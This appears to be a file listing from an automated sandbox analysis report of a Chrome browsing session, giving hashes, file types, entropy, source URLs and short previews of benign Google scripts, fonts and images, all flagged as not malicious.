                                                                                                                                                                                                                                                                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2842
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.916245544744882
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:8Ji0RGsI2kULW/N+oRoiX0wm6A2EQjh6NTpkaVbzByCtdM:QG3WLUN7RoW0wcQd2TKaVbzo
                                                                                                                                                                                                                                                                                          MD5:93F51A891FA68CFB985A5280CE2F6684
                                                                                                                                                                                                                                                                                          SHA1:73D1091E97CE2EB94E310EAEED3C7810938743D7
                                                                                                                                                                                                                                                                                          SHA-256:86CDE5C6EC67D5184DAE8FBBD20DBE83EFE5A4E5EE7661F3092865113F2280B6
                                                                                                                                                                                                                                                                                          SHA-512:BD784E361B1A76B279A4D2491BC2E11075361A557E101C5908892E67E5F02D26BABA27F01853F1E0E4E3894C0242A40DF49303E7452B675EA1357435F8CCFE2F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../..?....m$.?._o..i.m#I..K/c|T.I.".....rx........zol..Y.H$^4..yu^.Wg.......u.f.~.eHn....)G.I@...I.;].X.......Bf9.*G......(=...r..q...6..AK/t.H.i\..........".?...K..M..I\.2'.Ky..r...KEfwB......D]...]).Y...1?[U......*...DgG..l9p.......fM"b.....tQ...ftE.8&0.$.E.i7..!.'*.2...|.......q..|.8.c.....9.....b.oh5^..$.V.IE........U<.d...W..=..>]...N=...9<..r.;..I....x.....8....I.o.......X31.)...ob......'"_6....t.Y...8......".`."....t]..&.........RDV...GS|.%`{2R0..$.+.....9...Ra.<..%.bG.u.h~........:g{,...pF.~...&. eMp..L..c`......h>?..m...(k...zg.vGua.Lu......Y:.L.a..G91...P..+qH........7....+/n...Q+.}p..s?...c..:dw.....}.~t..n....j...[.W\..4.7v_..../.yW.Gb...>9...}./o....35...W^Ds...W.......Gz;..;.#+gnY.m......C.}Hp....Z.......\.V.5<...w_..^h%^:...&.#vw...?q....5.u.Sx....V......!.....nu$[..J..(.f..D91...Tc..Q4:..;.h~.......>:..8"d.NYy.......m...}.|w4c....W...@@Y.@...e........hEf.f.=...J..._.....0+....4n..tQU....#=*[:f(......P.@.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (11167)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):15582
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.214914407283781
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:RBDApNA8O3u3D2YMBPaUOI2scu1K3LqNRP8qm:rDAVD22UOqcu1K3LqNuqm
                                                                                                                                                                                                                                                                                          MD5:4CFB45F3658A8849C5D078DB5D432601
                                                                                                                                                                                                                                                                                          SHA1:BA9EE0585E594388713796535F037BC5A363E205
                                                                                                                                                                                                                                                                                          SHA-256:ACE3B863248663AE1AA299D5F176B0AFBA874012D5F12BC1DCD8972CFD9B3654
                                                                                                                                                                                                                                                                                          SHA-512:3637A5F14B289998398FAFFF733A85A502552E65F14F8913EBED2B540B2852DADFE4FD3DDADDB81013E8AF004535B495B7291E9ABAFA5B8674F34CDE19169C09
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/_OAi-NRQ.min.js
                                                                                                                                                                                                                                                                                          Preview:import{A as l,x as k,r as $,s as C}from"./ycaG4YXp.min.js";import{e as S}from"./0XPwTFcg.min.js";import{n as i}from"./IYoTYjYE.min.js";import{e as _}from"./p9kcPq91.min.js";import{o as N}from"./5Ss99t85.min.js";import{o as I}from"./RpI-OtYr.min.js";import{Y as P}from"./rwBjrn-0.min.js";import{R as E}from"./bAPu5B1A.min.js";import{r as v}from"./lHimDk5Y.min.js";/**. * @license. * Copyright 2018 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const c=t=>t??l;/**. * @license. * Copyright 2020 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const y=Symbol.for(""),j=t=>{if(t?.r===y)return t?._$litStatic$},g=(t,...o)=>({_$litStatic$:o.reduce((n,e,a)=>n+(u=>{if(u._$litStatic$!==void 0)return u._$litStatic$;throw Error(`Value passed to 'literal' function must be a 'literal' result: ${u}. Use 'unsafeStatic' to pass non-literal values, but. take care to ensure page security.`)})(e)+t[a+1],t[0]),r:y}),m=new Map,z=t=>(o,...n)=>{const e=n.length;let a,u;const h=[],w=[];let
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (589)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1667
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.278039239668347
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:XrNKndOZYoLmuCiuX4NRJqBGbafGGbZA/G4k:xfbLmu44N6fY/G3
                                                                                                                                                                                                                                                                                          MD5:EA4ADC15F724C0AC1E387D938A83F80C
                                                                                                                                                                                                                                                                                          SHA1:6803C0D06AC435C585D0442F13F78EBE65DF70B4
                                                                                                                                                                                                                                                                                          SHA-256:C5637F11FD5C0CC385949230CD2164AF65C8299A4AE4F983C97CF893BCF1877A
                                                                                                                                                                                                                                                                                          SHA-512:DEDB73EBA131AA9F4B9CAA549882B0919F134CA15238E844A2190EFDFCD8858DE220E367364E531D24CD6E4954C2CC04BD281BD37EAF5C0AFD77D360D301C2E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:this._hd=this._hd||{};(function(_){var window=this;.try{._.w("lOO0Vd");._.Yab=new _.Nd(_.mLa);._.y();.}catch(e){_._DumpException(e)}.try{.var ibb;_.jbb=function(a,b,c,d,e){this.NEa=a;this.Pld=b;this.plb=c;this.Ord=d;this.rEd=e;this.jcb=0;this.olb=ibb(this)};ibb=function(a){return Math.random()*Math.min(a.Pld*Math.pow(a.plb,a.jcb),a.Ord)};_.jbb.prototype.Z2b=function(){return this.jcb};_.jbb.prototype.Tja=function(a){return this.jcb>=this.NEa?!1:a!=null?!!this.rEd[a]:!0};_.kbb=function(a){if(!a.Tja())throw Error("ye`"+a.NEa);++a.jcb;a.olb=ibb(a)};.}catch(e){_._DumpException(e)}.try{._.w("P6sQOc");.var lbb=function(a){var b={};_.Fa(a.qsb(),function(e){b[e]=!0});var c=a.mrb(),d=a.Arb();return new _.jbb(a.zrb(),c.ka()*1E3,a.mib(),d.ka()*1E3,b)},mbb=!!(_.Kg[30]&1);var nbb=function(a){_.Bn.call(this,a.Ma);this.logger=null;this.ka=a.service.gDb;this.ta=a.service.metadata;a=a.service.Abd;this.fetch=a.fetch.bind(a)};_.C(nbb,_.Bn);nbb.Ga=function(){return{service:{gDb:_.dbb,metadata:_.Yab,Abd:_.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 34184, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):34184
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99444009565784
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:8pJf8lXHzTyT3P9QWCHmzL3WbHPBBWQfIKkydgMbG48B/u:u0lDTyrKWCHeL3OBDwKdmp9u
                                                                                                                                                                                                                                                                                          MD5:1ACA735014A6BB648F468EE476680D5B
                                                                                                                                                                                                                                                                                          SHA1:6D28E3AE6E42784769199948211E3AA0806FA62C
                                                                                                                                                                                                                                                                                          SHA-256:E563F60814C73C0F4261067BD14C15F2C7F72ED2906670ED4076EBE0D6E9244A
                                                                                                                                                                                                                                                                                          SHA-512:808AA9AF5A3164F31466AF4BAC25C8A8C3F19910579CF176033359500C8E26F0A96CDC68CCF8808B65937DC87C121238C1C1B0BE296D4306D5D197A1E4C38E86
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjIUvQ.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2..............X......................................4?HVAR.k.`?STAT..'...J/<.....`..(..Z.0..N.6.$.... .....K..[O;q..w....z.....%.O.t'*.R...*.6.{..@.k......C.B..Z.uU.}..!.".....]jK.`&.\..4...US.......x..C...1g.:.+.?.t<....J...C.p.c..J...........V..H1.6.~..n.]~"R*>..s....7....FE1.S/m....}..<....M..IHB.._8.d.3"......8..t.;f._~X.A.&n.1..t..v...n.._............eS.......!V."v6.xm|M..O.z..,....,...N.1......y^7...^^.$.!.$<V..B....."j..!2..Y"..{w!..Z.[...]H....*M-.*".8j.<..X.[{..UI....ML.J.?4B.....]..4..()^Bi.4iD/..]....../I.-.J[D...........c...)63.U.rFpW5}.9$..2...t..:.MW.c.N...lK...3^......./..v. !...;..v.w./^S...\U....|.......Y9...a.z.....i..$J.U...Ks....0Q*.........iy.....M..@..........&..c.kh.(<.O.....~..#.-.gfw.t...nbo...]0'G.!.2.8....y.K..;%......_).W..?.'.DTR.H....G.Al..d......g>.6..(.."4l...3$...\_.W}..R...\.o........`..q...@XG.wpN......!....&...\.&.....N..5..n......g..bR......HV...s...e..r.0ty&.SW.j.{I...".m .s..T....l....@th:..aM.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1440x807, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):44240
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.862606515338374
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:bL//3tSIjGcgEmd1VrVoZnQ7T57TGmLd0ZtvFkdg2L+wk570cI:PhGcgEmHVruZQ7d7TLuBk2A+O5
                                                                                                                                                                                                                                                                                          MD5:D8A768D7A63A9EB948335737AEE52397
                                                                                                                                                                                                                                                                                          SHA1:D4C298BB0BFADF4C8F80C5421E55CE15E8C94387
                                                                                                                                                                                                                                                                                          SHA-256:3BD8F2BA615426E23FC87CE9CA563087881F6473B290360D37AA664B336A252C
                                                                                                                                                                                                                                                                                          SHA-512:93ADA1BD6D533B5DEC84C9B304DEA3A0A0C1AEDE082DA8B305DF511AEC8FD4C1F0D668295799E8E434E083BB1EE3F397273D7C50F1B1CABD884E1AA4E6C11B86
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/viBN3SXlX2ACEJsf7pd1Ud4Y2-YcsXer3nwbHVaJ9u8L7-R3x0BJWyQuDN22YPj9Bcv18a7qf_qU6-ciR-DE2eYv6_UHGzTi7OgWlLBs-wYATVRAar6p=w1440-l80-sg-rj-c0xffffff
                                                                                                                                                                                                                                                                                          Preview:......JFIF............................................................ .........!%!.%...................................................(...((((..(..(.(.(......'...."........................................>.......................!..1..AQaq"2...Rr....#B...b.3C..c.$S................................&.......................!1...AQ.a"2qB............?..x..)~i}H.......A..@....`4]..b.`.W..........M.....y.W..%.c.8..}.Wp....~%W.j...Y.9...D.!......`!..........@....... . ....................................P........t...$P........S.$i.h..J.0F.{.._k.r|...n.....N..p..........ly.....l..M..>R.H..t[CQ.&.h.q!..yD.Bh.h.#V.h..D.H.h.Q ..M(....4.".%2...i.g.X.TRA.ZD..*5.&.3h(..\.G).&.*.*.F.....J.@d.-.4K@b..4.m..kD.63b..A!....m4A(.....:%.V.h..Z%. EPP...M....QD...X.B...-...4..T&.......P.@].. .h(..) .......PR..EE.....PQ@.$....&.AE$.E.$TK.E ...H.."..F.[.u.%#Lku..;.............F........h+2F...A.z.Y!.h.`u8?Te_Y?...&..A.....#....g.sH...9&Ed.S$2........Lb` .(.............@0..0 ........C....P..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 700x291, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):32121
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.959988915828294
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:VbvRraEW/j/15EtKUgEFqO/ql2IfE9kgfnWa:VVrgB5oKCMC82IfE9kg/n
                                                                                                                                                                                                                                                                                          MD5:BA3DC10B6B2271A048C6C1E6FFA08540
                                                                                                                                                                                                                                                                                          SHA1:F47408BFF881A37F0393AF43A088D381A2568245
                                                                                                                                                                                                                                                                                          SHA-256:F08D91C3B69574EEA9E243BF6B8FC85629FE7FA0DDF2EF18759AB1F1B46C8541
                                                                                                                                                                                                                                                                                          SHA-512:5508A1EDC0EB0FA98C385288160BFB282E07C494730D2C00CC63813BBFBD76EB987834A3BB74BE0738DD8E205726577F3860FD846699AA2FE483A13A03AB3513
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......JFIF......................................................................................................................................................#....".........................................Y........................!.1..AQaq.."2......#$3BRcrt......4STbs......C......Dd...5U..%....................................E.........................!1AQaq..".......2...#BR..34br..S...s....$D............?...U.*P..JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR...(.JR..x.....i$k..0......*"-./#".o..[.6.1..D...7D
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1440x772, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):59482
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996781815118211
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:Mx2JOahGmV1ywxj58sLKcnutY99NmIVChXWL7NIBpjkbcSBasxuxbjQzEO4K2Rr9:oAGmPyEyqutY9mEttxux0S5RzvT68q61
                                                                                                                                                                                                                                                                                          MD5:B7A2BA16E91782E704D09D339B4FECC5
                                                                                                                                                                                                                                                                                          SHA1:59D37A768E15E7C070A3C2C48FBEF153DCD3349F
                                                                                                                                                                                                                                                                                          SHA-256:E9260D215DF7CA7BDA316DA617A4AA85A334BF4547C3330EA08E08E5B6727D16
                                                                                                                                                                                                                                                                                          SHA-512:C07CFE97AA4E388E859E20970E7B4926BB4C78F52B05BC7C62F76D37EB2FD111C6F937EBEDAB3CB9224713D0696701AE3D291753269C74006C4667A0D3551950
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/1b/03/413e33484db097e0e9a84134cc42/bgimg-travel-2-jpg.webp
                                                                                                                                                                                                                                                                                          Preview:RIFFR...WEBPVP8 F...P....*....>m6.G.&"%'u.....im~...R.k......)..!.W......6?._.W9e-.. h<+........>......Z...g0......B...2.W....~.......?...y.......y.i...*.s...?..._....3...S.>....\......g.;..7...g..O.o.^......#......?y=.....H.....")._._.6@t....|8.9.z...v.j..a.....#..i|...+.xN....._;M...&R.BAT.....5..Bk.8....U....f..qC.7.....1..A.........e?W...SE"....Pd..g.E.u..a#.....8.+uM..(iVqA.......NG2[G..ewcE./.[.s........:....9....|.......^.UW..X.]I.Yd.b..YMQ..2..=.....v..<\..[......5~.]...W.R..+7........!..58...."......8 KM.............]e......5...v..........#.3fv.A.b......I...U....T..X..,...!7..N..D.B...+hX.:;...Y}%8n....Mu..2A..\..Ib....r.c";.er..'...j...-f.3.\2..?..N.&_...Y...)wP.(......0N.b..=......-..>..#( ....XhR.tp.\...A.].V;....7..@....;.3...h..YJn..i;y@....D..Y..v,...|(..L.h;-....T..R.gl........x...5..B^.......Ls)~.o.......W'].....X:.^h,....s.T.b....3S.n.t..$...`..!....0..Vl..O......`^B...S....!..,....I..j.../@..0.......h.h.j......5....C*
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (593)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1670
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.336764995547798
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Byp1JLMeOeyH3w6G0SjE30rxaCMGbQoUGbsQP3h:ByNMeOeyXw6lSjZrxabooQJ
                                                                                                                                                                                                                                                                                          MD5:DC1D542C406F52529E16AF1FE3247B98
                                                                                                                                                                                                                                                                                          SHA1:A3839F0CA57DDCB9376319DCD104BC6F7CFD8B71
                                                                                                                                                                                                                                                                                          SHA-256:87DFCBC47FE34ADDEECC61DF346C8D84FFBA4602FDAEF81846332053F1497723
                                                                                                                                                                                                                                                                                          SHA-512:2F3B8083CDF6B496B89726025F9F63E7871759C8A5F0399FB758D934EE7F645212747F50218F5178455A54A7956E113598E98C2B6376C310E57DD8568758FBD7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.google.com/xjs/_/js/k=xjs.s.en_US.u9kBZBte-Es.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAACBAIEAAAAAABQAAAAAAAAAAAAAAAAAAAAAIBAAgJAQAAACAABwAAAAICAAABAAAAERAAAEiAAAAAgAAAAAAAAAAIgAYAIAAAAAAC4AABAoAgAAEAAAgAEAAIAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAACCEA_AAAAAAAAAAAAAAgAAAAAAAYAAAAAAAAAAIAAAAAQIADAABmAAAAAAAAAAO4DgOABgCGFBQAAAAAAAAAAAAAAAIAEwViQgIIAAAAAAAAAAAAAAAAAAAAAKUETBwg/d=0/dg=0/br=1/rs=ACT90oGlQ_qSjncWQjAN6Nnblp3ZMWaSlA/m=lOO0Vd,sy97,P6sQOc?xjs=s4"
                                                                                                                                                                                                                                                                                          Preview:this._s=this._s||{};(function(_){var window=this;.try{._.x("lOO0Vd");._.Neb=new _.Md(_.iOa);._.y();.}catch(e){_._DumpException(e)}.try{.var Xeb;_.Yeb=function(a,b,c,d,e){this.qvb=a;this.y3f=b;this.LBc=c;this.Zbg=d;this.Lyg=e;this.Flc=0;this.KBc=Xeb(this)};Xeb=function(a){return Math.random()*Math.min(a.y3f*Math.pow(a.LBc,a.Flc),a.Zbg)};_.Yeb.prototype.mMd=function(){return this.Flc};_.Yeb.prototype.B_a=function(a){return this.Flc>=this.qvb?!1:a!=null?!!this.Lyg[a]:!0};_.Zeb=function(a){if(!a.B_a())throw Error("Be`"+a.qvb);++a.Flc;a.KBc=Xeb(a)};.}catch(e){_._DumpException(e)}.try{._.x("P6sQOc");.var $eb=function(a){var b={};_.Pa(a.QNc(),function(e){b[e]=!0});var c=a.jMc(),d=a.JMc();return new _.Yeb(a.IMc(),c.oa()*1E3,a.Txc(),d.oa()*1E3,b)},afb=!!(_.Hg[33]>>29&1);var bfb=function(a){_.On.call(this,a.Ka);this.logger=null;this.oa=a.service.N3c;this.Ba=a.service.metadata;a=a.service.CNf;this.fetch=a.fetch.bind(a)};_.F(bfb,_.On);bfb.Ha=function(){return{service:{N3c:_.Seb,metadata:_.Neb,CNf:
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text, with very long lines (1753)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1754
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.188691628143211
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:b+za3Y8Nww4B4N/0UD46Cwxj5bo74Yi6pYcNYcLcG3YcZWGjXgjUN1AydEFsFOk5:WCYw//D/35YYcNYcIeYcpxfssokYcRN
                                                                                                                                                                                                                                                                                          MD5:92299B4291E2A24715DA3600042C74BB
                                                                                                                                                                                                                                                                                          SHA1:0DE9BB6E20F178BB28C08DA0C44C240353A0616B
                                                                                                                                                                                                                                                                                          SHA-256:14E1117520C086DC26E0D41367536935DEE39DB0E244C7658F52EBAD798AD8C0
                                                                                                                                                                                                                                                                                          SHA-512:93C106D0D84ADA18C6F9544B458D12A7606F35CFEB051FF10B91A08CC5FA2BF98A315F71AEECDC7D903C9151436094A02996DDF6B649D13CA4DE83D648B6E1A6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:class l{constructor(){this.callbacks=[],this.activeBreakpoints=[],this.scheduled=!1,this.queries=[{name:"desktop",query:window&&window.matchMedia("(min-width: 1440px)")},{name:"laptop-gt",query:window&&window.matchMedia("(min-width: 1024px)")},{name:"tablet-lt",query:window&&window.matchMedia(`(max-width: ${1024-.02}px)`)},{name:"laptop",query:window&&window.matchMedia(`(min-width: 768px) and (max-width: ${1440-.02}px)`)},{name:"tablet",query:window&&window.matchMedia(`(min-width: 768px) and (max-width: ${1024-.02}px)`)},{name:"mobile",query:window&&window.matchMedia("(max-width: 768px)")}];for(const t of this.queries)t.query.matches&&this.updateBreakpointStatus(t),t.query.addEventListener("change",()=>{this.handleChange(t)});this.scheduleUpdate()}subscribe(t){this.callbacks.push(t)}updateBreakpointStatus(t){t.query.matches?this.activeBreakpoints.push(t.name):this.activeBreakpoints=this.activeBreakpoints.filter(d=>d!==t.name)}handleChange(t){this.updateBreakpointStatus(t),this.schedule
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32066)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):107961
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.359093244687028
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:jV4hHAqu0mcKYXcnNUyHTPLkABMyl9A7/nplFblCPgKDrNUK:jiRVu0lKY666LkABNl9YPb7KNUK
                                                                                                                                                                                                                                                                                          MD5:499BA64A23378545748FF12D372E59E9
                                                                                                                                                                                                                                                                                          SHA1:EAA4E4A08400DA3F22DEDDA706BA56CDCE5B0B7A
                                                                                                                                                                                                                                                                                          SHA-256:001ACBB15D9C69510C0817E6DDE361BFF098406FAD182AB3C367F86FF3DA8343
                                                                                                                                                                                                                                                                                          SHA-512:F16CB8287D0EF80BB38CC9B5C3941F6798F9FF2F10FE471492D2BD98F515694A01BE1DD03D4641F36D96FEFCBB50BAAB8B7C91F1D687DC5E7CF98F19D3CAB37A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/external_hosted/gsap/v1_18_0/TweenMax.min.js
                                                                                                                                                                                                                                                                                          Preview:/*!. * VERSION: 1.18.0. * DATE: 2015-09-05. * UPDATES AND DOCS AT: http://greensock.com. * . * Includes all of the following: TweenLite, TweenMax, TimelineLite, TimelineMax, EasePack, CSSPlugin, RoundPropsPlugin, BezierPlugin, AttrPlugin, DirectionalRotationPlugin. *. * @license Copyright (c) 2008-2015, GreenSock. All rights reserved.. * This work is subject to the terms at http://greensock.com/standard-license or for. * Club GreenSock members, the software agreement that was issued with your membership.. * . * @author: Jack Doyle, jack@greensock.com. **/.var _gsScope="undefined"!=typeof module&&module.exports&&"undefined"!=typeof global?global:this||window;(_gsScope._gsQueue||(_gsScope._gsQueue=[])).push(function(){"use strict";_gsScope._gsDefine("TweenMax",["core.Animation","core.SimpleTimeline","TweenLite"],function(t,e,i){var s=function(t){var e,i=[],s=t.length;for(e=0;e!==s;i.push(t[e++]));return i},r=function(t,e,i){var s,r,n=t.cycle;for(s in n)r=n[s],t[s]="function"==typeof r?r.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (1417), with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1417
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.554782902970088
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:Z0dNbeYh5zox64JWTXBU7Me49kCqvzoccKR0YpQwzbf0EJjXEi05SETsVaw32AkD:ZaxeepoLWTXB09LozobMujXEpzIVaCnm
                                                                                                                                                                                                                                                                                          MD5:C2EEE6AD8D864079CFB48882A5D11A9A
                                                                                                                                                                                                                                                                                          SHA1:3964D860EA96480D1B1544FF3EFE7218E2EEFB53
                                                                                                                                                                                                                                                                                          SHA-256:BB19153BDA63B1FF31517257AA39574DC69E8DC0527CB4E8AD37E521B084AA83
                                                                                                                                                                                                                                                                                          SHA-512:434E46B5E2086FE51FD15EFAF4D9BBEA8A88E0D2A503EFDBEB32F4E5AEAEB985D169202A2CA5216AFF7258847B8C0F57D6DA114FF0CC5F1B1D0DEC6C21AAE0FA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://equable-toothpaste.surge.sh/3p71OSuGgCok6FO7ZFUhEbb2gK9ZxuYZxdl2y8HSfVs0EX73KA1HgLgJ27HZhYYVRvyXf0wdADRdJRXB50aRUURx9Hm30U2w0fTUESK7HdbXMKiz1Lr9qbxMGWIab3H6h21Ta7aoVRUAo0LiDrfvUQsQM5QvPwbYFfyuMm64auSaaWLktuJtAYtcI5O7E95y0ss/
